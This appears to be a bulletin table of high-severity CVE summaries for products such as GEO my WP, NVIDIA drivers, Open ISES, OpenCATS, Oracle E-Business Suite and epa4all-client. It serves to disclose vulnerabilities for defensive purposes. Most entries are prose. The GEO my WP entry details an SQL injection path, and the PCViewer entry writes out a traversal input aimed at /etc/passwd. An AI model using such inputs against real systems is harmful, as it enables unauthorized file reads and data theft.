| ninjew--GEO my WP | The GEO my WP plugin for WordPress is vulnerable to SQL Injection via the 'swlatlng' and 'nelatlng' parameters in all versions up to, and including, 4.5.5. The parameters are read from $_SERVER['QUERY_STRING'] via parse_str() (bypassing WordPress's wp_magic_quotes protection, which only covers $_POST/$_GET/$_COOKIE/$_REQUEST), then each is split on ',' via explode() and the resulting fragments are interpolated directly into a SQL BETWEEN clause in gmw_get_locations_within_boundaries_sql() without is_numeric() validation, (float) casting, esc_sql(), or $wpdb->prepare(). This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Exploitation requires the site to host the Posts Locator search-results shortcode (`[gmw form="results" form_id=N]`) on a public page and to have at least one published post with an associated gmw_location row. | 2026-05-30 | 7.5 | CVE-2026-9757 |
| Nordvpn--NordVPN | Nord VPN 6.14.31 contains a denial of service vulnerability that allows unauthenticated attackers to crash the application by submitting an excessively long string in the password field. Attackers can paste a buffer of repeated characters into the password input field to trigger an application crash when attempting to authenticate. | 2026-05-25 | 7.5 | CVE-2018-25368 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability where an attacker could cause a use-after-free. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 8.8 | CVE-2026-24187 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause improper access to GPU resources. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24190 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows contains a vulnerability where an attacker could cause a time-of-check time-of-use issue. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24191 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability where an attacker could cause an incorrect conversion between numeric types, leading to a heap buffer overflow. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24192 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows and Linux contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24193 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability in a kernel mode layer handler, where a user could cause improper permission handling. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7.8 | CVE-2026-24194 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability where a user could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to denial of service and information disclosure. | 2026-05-26 | 7.1 | CVE-2026-24196 |
| NVIDIA--Guest driver | NVIDIA Display Driver for Linux contains a vulnerability in UVM, where a user could cause improper input validation. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 7.1 | CVE-2026-24195 |
| NVIDIA--Isaac Launchable | NVIDIA Isaac Launchable for Linux contains a vulnerability where sensitive information is transmitted in clear text. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2026-05-26 | 7.5 | CVE-2026-24212 |
| NVIDIA--Merlin Transformers4Rec | NVIDIA Transformers4Rec for Linux contains a vulnerability where an attacker could cause improper deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure. | 2026-05-26 | 7.8 | CVE-2026-24162 |
| NVIDIA--Virtual GPU Manager | NVIDIA vGPU software contains a vulnerability in the virtual GPU manager, where an attacker could cause a use-after-free for stack memory. A successful exploit of this vulnerability might lead to denial of service, escalation of privileges, information disclosure, data tampering, and code execution. | 2026-05-26 | 7 | CVE-2026-24200 |
| nyariv--SandboxJS | SandboxJS is a JavaScript sandboxing library. Prior to 0.9.6, sandbox-defined functions expose Function.caller, allowing sandboxed code to recover the internal LispType.Call runtime callback. That callback can then be invoked with attacker-controlled fake context and obj values to extract blocked host statics, recover the real host Function constructor, and execute arbitrary host JavaScript. This vulnerability is fixed in 0.9.6. | 2026-05-28 | 10 | CVE-2026-43898 |
| omnivo--Booking Calendar Event Calendar | The HBook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'hb_country_iso', 'hb_usa_state_iso', and 'hb_canada_province_iso' parameters in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page (the HBook Customers admin page). | 2026-05-27 | 7.2 | CVE-2026-8143 |
| OneUptime--oneuptime | OneUptime is an open-source monitoring and observability platform. Prior to 10.0.98, OneUptime uses the Node.js' vm module as an isolation primitive. This API was not designed for that and can be escaped via error objects and infinite recursion. This vulnerability is fixed in 10.0.98. | 2026-05-27 | 9.9 | CVE-2026-45102 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the frm_passwd parameter. Attackers can send POST requests to main.php with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details. | 2026-05-29 | 8.2 | CVE-2018-25398 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the tick_lat and tick_lng parameters. Attackers can send GET requests to nearby.php with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details. | 2026-05-29 | 8.2 | CVE-2018-25399 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to the ajax/form_post.php endpoint with crafted SQL payloads to extract sensitive database information including schema names and other data. | 2026-05-29 | 8.2 | CVE-2018-25400 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the p1 parameter. Attackers can send GET requests to sever_graph.php with crafted SQL payloads to extract sensitive database information including schema names and other data. | 2026-05-29 | 8.2 | CVE-2018-25401 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the p1 parameter. Attackers can send GET requests to inc_types_graph.php with crafted SQL payloads to extract sensitive database information including schema names and other data. | 2026-05-29 | 8.2 | CVE-2018-25402 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the p1 parameter. Attackers can send GET requests to city_graph.php with crafted SQL payloads to extract sensitive database information including schema names and other data. | 2026-05-29 | 8.2 | CVE-2018-25403 |
| Open ISES--Open ISES Project | The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the ticket_id parameter. Attackers can send GET requests to add_facnote.php with crafted SQL payloads to extract sensitive database information including version details and other data. | 2026-05-29 | 8.2 | CVE-2018-25404 |
| open-telemetry--opentelemetry-js | opentelemetry-js is the OpenTelemetry JavaScript Client. Prior to 0.217.0, a single malformed HTTP request crashes any Node.js process running the OpenTelemetry JS Prometheus exporter. The metrics endpoint (default 0.0.0.0:9464) has no error handling around URL parsing, so a request with an invalid URI causes an uncaught TypeError that terminates the process. This vulnerability is fixed in 0.217.0. | 2026-05-27 | 7.5 | CVE-2026-44902 |
| Open5GS--Open5GS | A vulnerability was identified in Open5GS up to 2.7.6. This impacts an unknown function of the file src/amf/ngap-handler.c of the component NGAP PathSwitchRequest Message Handler. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The identifier of the patch is a188e36b1741ffc2252133f59b1bda4f14d3cb5c. It is suggested to install a patch to address this issue. | 2026-05-31 | 7.3 | CVE-2026-10157 |
| OpenCATS--OpenCATS | OpenCATS through 0.9.7.4 contains an SQL injection vulnerability in the sortDirection parameter of the DataGrid component that allows authenticated users to extract database contents. Attackers can inject malicious SQL via the sortDirection parameter in ajax/getDataGridPager.php to perform time-based blind injection attacks and read sensitive data. | 2026-05-31 | 8.5 | CVE-2026-49489 |
| OpenCATS--OpenCATS | OpenCATS from version 0.9.1a contains an SQL injection vulnerability in DataGrid filter handling that allows authenticated attackers to inject SQL through crafted filters targeting the non-filterable Tags column in the Candidates DataGrid. Attackers can bypass column filterable restrictions by manipulating filter requests to execute arbitrary SQL queries against the database. | 2026-05-31 | 8.1 | CVE-2026-49490 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.4 contains an authorization bypass vulnerability in the bundled device-pair plugin that allows non-owner authorized chat senders to issue device-pairing bootstrap codes without proper scope validation. Attackers with chat command access can create setup codes to enroll devices with operator/node capabilities, granting persistent credentials until manual removal. | 2026-05-29 | 8.3 | CVE-2026-32905 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains an authorization bypass vulnerability in QQBot native approval buttons that fails to enforce configured approver identity. Non-approver users can click approval buttons to resolve pending exec or plugin approval requests without proper authorization. | 2026-05-29 | 8 | CVE-2026-35630 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a scope bypass vulnerability in the Gateway chat.send route that allows scoped clients to execute privileged commands. Attackers with operator.write scope can deliver commands through inherited external routes to bypass operator.approvals and operator.admin scope requirements, enabling unauthorized plugin, config, MCP, allowlist, and ACP mutations. | 2026-05-29 | 8.8 | CVE-2026-35674 |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to 6.9.7, an organization admin can escalate their privileges by adding a user from a different organization with higher privileges, to their own organization. This is due to incorrect ACL on userEdit relationAdd. This vulnerability is fixed in 6.9.7. | 2026-05-26 | 7.2 | CVE-2026-44730 |
| Openises--Open ISES Project | The Open ISES Project 3.30A contains a path traversal vulnerability in the ajax/download.php endpoint that allows unauthenticated attackers to download arbitrary files by manipulating the filename parameter. Attackers can supply directory traversal sequences ../ in the filename parameter to access files outside the intended directory, including configuration files and system files. | 2026-05-30 | 7.5 | CVE-2018-25408 |
| Openkm--OpenKM Community Edition | OpenKM 6.3.12 contains an unrestricted SQL execution vulnerability that allows authenticated administrative users to execute arbitrary SQL statements against the application database via the DatabaseQuery interface. Attackers can submit malicious SQL queries through the qs parameter to the /admin/DatabaseQuery endpoint to extract sensitive data including usernames and password hashes from the OKM_USER table, modify permissions, or delete database records. | 2026-05-26 | 7.2 | CVE-2026-42425 |
| Openkm--OpenKM Community Edition | OpenKM 6.3.12 contains a remote code execution vulnerability that allows authenticated administrators to execute arbitrary Java/BeanShell code through the /admin/Scripting endpoint. Attackers can submit malicious script content with an action=Evaluate parameter to execute operating system commands in the context of the OpenKM application server. | 2026-05-26 | 7.2 | CVE-2026-42785 |
| openreplay--openreplay | OpenReplay is a self-hosted session replay suite. Prior to 1.26.0, OpenReplay's Python API exposes several app_apikey routes that trust a caller-provided projectKey after validating only that the API key itself is valid and that the target projectKey exists. The authorization flow does not verify that the authenticated API key and the requested project belong to the same tenant. Because the public tracker design exposes projectKey to browser-side code, an attacker who owns any valid API key for their own tenant can target another tenant's project by reusing that public projectKey. The vulnerable routes allow the attacker to enumerate victim user sessions and then retrieve sensitive session event data across the tenant boundary. This vulnerability is fixed in 1.26.0. | 2026-05-28 | 7.7 | CVE-2026-45296 |
| Oracle Corporation--Oracle Database Server | Vulnerability in the Net Service component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Net Service. While the vulnerability is in Net Service, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Net Service. CVSS 3.1 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9 | CVE-2026-46833 |
| Oracle Corporation--Oracle Database Server | Vulnerability in the Net Service component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Net Service. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Net Service. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-05-28 | 7.5 | CVE-2026-46834 |
| Oracle Corporation--Oracle Database Server | Vulnerability in the Net Service component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Net Service. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Net Service. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-05-28 | 7.5 | CVE-2026-46835 |
| Oracle Corporation--Oracle Financials Common Modules | Vulnerability in the Oracle Financials Common Modules product of Oracle E-Business Suite (component: Common Components). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financials Common Modules. While the vulnerability is in Oracle Financials Common Modules, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financials Common Modules accessible data as well as unauthorized update, insert or delete access to some of Oracle Financials Common Modules accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N). | 2026-05-28 | 8.5 | CVE-2026-46820 |
| Oracle Corporation--Oracle Financials Common Modules | Vulnerability in the Oracle Financials Common Modules product of Oracle E-Business Suite (component: Common Components). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financials Common Modules. While the vulnerability is in Oracle Financials Common Modules, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financials Common Modules accessible data. CVSS 3.1 Base Score 7.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N). | 2026-05-28 | 7.7 | CVE-2026-46821 |
| Oracle Corporation--Oracle Flow Manufacturing | Vulnerability in the Oracle Flow Manufacturing product of Oracle E-Business Suite (component: Security). Supported versions that are affected are 12.2.9-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via SQL to compromise Oracle Flow Manufacturing. Successful attacks of this vulnerability can result in takeover of Oracle Flow Manufacturing. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 8.8 | CVE-2026-46837 |
| Oracle Corporation--Oracle Hospitality OPERA 5 Property Services | Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Opera). Supported versions that are affected are 5.6.19.24, 5.6.22, 5.6.25.19, 5.6.27.6 and 5.6.28. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality OPERA 5 Property Services. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 9.8 | CVE-2026-34311 |
| Oracle Corporation--Oracle iAssets | Vulnerability in the Oracle iAssets product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle iAssets. While the vulnerability is in Oracle iAssets, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle iAssets. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9.9 | CVE-2026-46822 |
| Oracle Corporation--Oracle Internet Procurement Connector | Vulnerability in the Oracle Internet Procurement Connector product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Internet Procurement Connector. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Internet Procurement Connector accessible data as well as unauthorized access to critical data or complete access to all Oracle Internet Procurement Connector accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). | 2026-05-28 | 9.1 | CVE-2026-46819 |
| Oracle Corporation--Oracle Payments | Vulnerability in the Oracle Payments product of Oracle E-Business Suite (component: File Transmission). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Payments. Successful attacks of this vulnerability can result in takeover of Oracle Payments. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 9.8 | CVE-2026-46817 |
| Oracle Corporation--Oracle Payments | Vulnerability in the Oracle Payments product of Oracle E-Business Suite (component: File Transmission). Supported versions that are affected are 12.2.3-12.2.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Payments. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Payments accessible data as well as unauthorized access to critical data or complete access to all Oracle Payments accessible data. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N). | 2026-05-28 | 7.4 | CVE-2026-46818 |
| Oracle Corporation--Oracle Payroll | Vulnerability in the Oracle Payroll product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle Payroll. Successful attacks of this vulnerability can result in takeover of Oracle Payroll. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 8.8 | CVE-2026-46826 |
| Oracle Corporation--Oracle Payroll | Vulnerability in the Oracle Payroll product of Oracle E-Business Suite (component: Self Service Manager). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Payroll. Successful attacks of this vulnerability can result in takeover of Oracle Payroll. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 8.8 | CVE-2026-46827 |
| Oracle Corporation--Oracle Payroll | Vulnerability in the Oracle Payroll product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Payroll. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Payroll accessible data as well as unauthorized access to critical data or complete access to all Oracle Payroll accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | 2026-05-28 | 8.1 | CVE-2026-46828 |
| Oracle Corporation--Oracle Public Sector Financials (International) | Vulnerability in the Oracle Public Sector Financials (International) product of Oracle E-Business Suite (component: Authorization). Supported versions that are affected are 12.2.6-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle Public Sector Financials (International). While the vulnerability is in Oracle Public Sector Financials (International), attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Public Sector Financials (International) accessible data. CVSS 3.1 Base Score 7.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N). | 2026-05-28 | 7.7 | CVE-2026-46823 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Backend-as-a-Service). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. While the vulnerability is in Oracle REST Data Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle REST Data Services. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 10 | CVE-2026-46840 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle REST Data Services. While the vulnerability is in Oracle REST Data Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle REST Data Services. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9.9 | CVE-2026-46775 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle REST Data Services. While the vulnerability is in Oracle REST Data Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle REST Data Services. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9.9 | CVE-2026-46839 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle REST Data Services accessible data as well as unauthorized access to critical data or complete access to all Oracle REST Data Services accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | 2026-05-28 | 8.1 | CVE-2026-35277 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle REST Data Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle REST Data Services accessible data as well as unauthorized access to critical data or complete access to all Oracle REST Data Services accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle REST Data Services. CVSS 3.1 Base Score 7.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L). | 2026-05-28 | 7.9 | CVE-2026-35266 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Mongoapi). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle REST Data Services. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-05-28 | 7.5 | CVE-2026-46829 |
| Oracle Corporation--Oracle Universal Work Queue | Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Work Provider Site Level Administration). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Universal Work Queue. While the vulnerability is in Oracle Universal Work Queue, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9.9 | CVE-2026-46824 |
| Ourenergy--Collectric CMU | Collectric CMU 1.0 contains a boolean-based blind SQL injection vulnerability in the lang parameter that allows unauthenticated attackers to manipulate database queries during authentication. Attackers can inject SQL code through the lang parameter in login requests to extract sensitive information from the database using time-based blind techniques. | 2026-05-25 | 8.2 | CVE-2018-25379 |
| OUSL-GROUP-BrinaryBrains--School Student Management System | A weakness has been identified in OUSL-GROUP-BrinaryBrains School Student Management System up to 1e70e5ad1125b86dca4ee086eb6bb121f17708b6. This impacts the function sign_auth_cookie of the file application/controllers/Login.php of the component MY_Controller. Executing a manipulation of the argument role can lead to improper authentication. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 7.3 | CVE-2026-10167 |
| oviva-ag--epa4all-client | epa4all-client is the Java Client for epa4all / ePA 3.0 in the Telematik Infrastruktur. Prior to 1.2.1, in SignedPublicKeysTrustValidatorImpl.isTrusted(), the ECDSA signature verification at line 45 discards the boolean return value of Signature.verify(). The method performs certificate chain validation, OCSP check, and signature algorithm setup, but never checks whether the signature actually matches. For any structurally valid signature, it returns true. This vulnerability is fixed in 1.2.1. | 2026-05-26 | 8.1 | CVE-2026-44900 |
| oviva-ag--epa4all-client | epa4all-client is the Java Client for epa4all / ePA 3.0 in the Telematik Infrastruktur. Prior to 1.2.2, an attacker on the network path between the ePA service and the Konnektor can present any TLS certificate (self-signed, expired, wrong CN) and intercept all SOAP traffic. This includes patient identifiers (KVNR), SMC-B card operations (authentication, signing), document content, and credential exchanges. This vulnerability is fixed in 1.2.2. | 2026-05-26 | 8.1 | CVE-2026-45574 |
| oviva-ag--epa4all-client | epa4all-client is the Java Client for epa4all / ePA 3.0 in the Telematik Infrastruktur. Prior to 1.2.2, an attacker who can MITM the TLS connection between the client and the IDP (within the TI network) can substitute a forged discovery document. The forged document redirects uri_puk_idp_enc and uri_puk_idp_sig to attacker-controlled URLs. The client then encrypts the SMC-B-signed challenge response to the attacker's encryption key and POSTs it to the attacker's auth endpoint. This captures the signed authentication material. This vulnerability is fixed in 1.2.2. | 2026-05-26 | 7.4 | CVE-2026-45575 |
| pacote--pacote | Versions of the package pacote from 11.2.7 are vulnerable to Denial of Service (DoS) via the addGitSha function. An attacker can exploit this vulnerability by supplying a specially crafted spec.rawSpec value that triggers the function's regex replacement and string-manipulation logic, causing excessive CPU consumption and potentially stalling or crashing the process. | 2026-05-26 | 7.5 | CVE-2026-9496 |
| PCViewer--PCViewer | PCViewer vt1000 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by submitting relative path sequences in GET requests. Attackers can use path traversal sequences ../../../../../../../../../../../../etc/passwd to access sensitive system files outside the intended directory. | 2026-05-25 | 7.5 | CVE-2018-25365 |
| Pensar--Apex | @pensar/apex <= 0.0.58 is vulnerable to OS command injection via the smart_enumerate tool. The createSmartEnumerateTool() function in src/core/agent/tools.ts constructs a shell command by concatenating unsanitized values from the extensions array and url parameter into a string passed to Node.js child_process.exec(). Because exec() spawns a shell, shell metacharacters in those values are interpreted by the host shell, resulting in arbitrary OS command execution with the privileges of the running process. | 2026-05-27 | 8.8 | CVE-2026-36044 |
| phbernard--Favicon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in phbernard Favicon favicon-by-realfavicongenerator allows Reflected XSS. This issue affects Favicon: from n/a through <= 1.3.46. | 2026-05-27 | 7.1 | CVE-2026-42754 |
| Phoenix Contact--AXC F 1152 | The Web-based Management allows a remote low privileged Engineer user to install additional APPs on the device downloaded from the PLCnext Store without implementing any data verification mechanism, leading to the capability for an Engineer user to reach arbitrary code execution with root privileges on the PLC device. A successful exploitation may allow to install a manipulated APP package, potentially impacting integrity and availability of the PLCnext Control. | 2026-05-27 | 8.8 | CVE-2025-41669 |
| Phoenix Contact--AXC F 1152 | A local user with low privileges may be able to influence the behavior of a privileged system service by manipulating configuration or application-related files located in user-writable areas of the filesystem. The affected service processes data from locations that are not sufficiently protected against modification by low-privileged users. As the service runs with elevated privileges, successful exploitation may result in a local privilege escalation. | 2026-05-27 | 7.8 | CVE-2025-41670 |
